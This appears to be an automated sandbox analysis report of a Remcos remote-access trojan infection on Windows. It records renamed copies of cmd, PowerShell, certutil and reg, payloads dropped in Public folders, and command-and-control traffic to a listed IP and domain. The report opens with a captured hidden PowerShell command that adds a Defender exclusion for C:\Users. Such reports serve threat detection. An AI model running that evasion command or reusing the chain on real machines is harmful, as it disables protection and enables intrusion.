Registry value created: NULL C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users

Jump to behavior

Compliance

Source: unknown	HTTPS traffic detected: 23.35.153.42:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.217.193:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
Source:	Binary string: easinvoker.pdbH source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr

Spreading

Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,		4_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,		4_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,		4_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,		4_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,		4_2_00007FF789BE7B4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,		6_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,		6_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,		6_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,		6_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,		6_2_00007FF789BE7B4C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,		25_2_00007FF67DEB5E58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF119F8 #359,FindFirstFileW,FindNextFileW,FindClose,		25_2_00007FF67DF119F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,		25_2_00007FF67DEBDBC0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,		25_2_00007FF67DF11B04
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,		25_2_00007FF67DEF3674
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,		25_2_00007FF67DEBD4A4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE7D440
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,		25_2_00007FF67DEBB3D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,		25_2_00007FF67DF16F80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,		25_2_00007FF67DF110C4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,		25_2_00007FF67DF13100
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,		25_2_00007FF67DEAC6F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,		25_2_00007FF67DF1234C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9FBB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,		28_2_1B9FBB30
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9FC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,		28_2_1B9FC34D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA0C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,		28_2_1BA0C291
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA09AF5 FindFirstFileW,		28_2_1BA09AF5
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9F880C FindFirstFileW,FindNextFileW,FindClose,		28_2_1B9F880C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9F783C FindFirstFileW,FindNextFileW,		28_2_1B9F783C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9F9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,		28_2_1B9F9665
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9FBD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,		28_2_1B9FBD37
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA3E879 FindFirstFileExA,		28_2_1BA3E879
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,		29_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,		29_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,		29_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,		29_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,		29_2_00007FF789BE7B4C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,		36_2_029A5878
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,		36_2_2106C34D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21069253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,		36_2_21069253
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2107C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,		36_2_2107C291
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21069665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,		36_2_21069665
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,		36_2_2106880C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106783C FindFirstFileW,FindNextFileW,		36_2_2106783C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210AE879 FindFirstFileExA,		36_2_210AE879
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,		36_2_2106BB30
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21079AF5 FindFirstFileW,FindNextFileW,FindNextFileW,		36_2_21079AF5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,		36_2_2106BD37

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Code function: 36_2_21067C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

36_2_21067C97

Networking

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49730 -> 83.137.157.85:9231
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 83.137.157.85:9231 -> 192.168.2.5:49730

Source: Malware configuration extractor

URLs: ^www.pentegrasystem.com

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_028AC78C InternetCheckConnectionA,

28_2_028AC78C

Source: global traffic

TCP traffic: 192.168.2.5:49730 -> 83.137.157.85:9231

Source: global traffic	HTTP traffic detected: GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1Accept-Encoding: gzip, deflateHost: cxcs.microsoft.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: INVITECHHU INVITECHHU

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1B9F4B96 WaitForSingleObject,SetEvent,recv,

28_2_1B9F4B96

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-19; NID=513=dIEywckpmnBKntp2GElYlpvANdg1GQg9WS73nz-f5glf4IBfUl3eMpZgnnmShpr9iJ8zBJZaj0vDbSmMSmPVIAAqShn63hvugGyDDhjdWhTmo6-iPW_P22G1Soq0NtFRvrRQtxSQbMFi5XmOtW4IBgt7x104_UZ5eznyt1erQT0
